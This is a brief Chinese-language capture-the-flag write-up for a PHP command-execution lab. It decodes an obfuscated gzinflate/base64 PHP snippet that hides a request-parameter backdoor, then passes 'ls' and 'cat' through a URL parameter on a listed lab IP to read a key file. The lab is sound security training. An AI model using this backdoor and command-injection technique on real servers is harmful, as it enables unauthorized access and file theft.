PHP代码分析溯源(第4题)
难易程度:★★★
题目类型:命令执行
使用工具:FireFox浏览器
1.打开靶场,看到一串php代码。
2.使用echo,运行一下代码。
<?php echo(gzinflate(base64_decode("&40pNzshXSFCJD3INDHUNDolOjE2wtlawt+MCAA==&"))); ?>
得到echo $_REQUEST[a]
;; ?>
3.在url中输入http://219.153.49.228:44292/f.php?a=ls,查看文件。
发现key_271361372930789.php。
4.将命令ls改为cat key_271361372930789.php,按F12查看源码,获取key。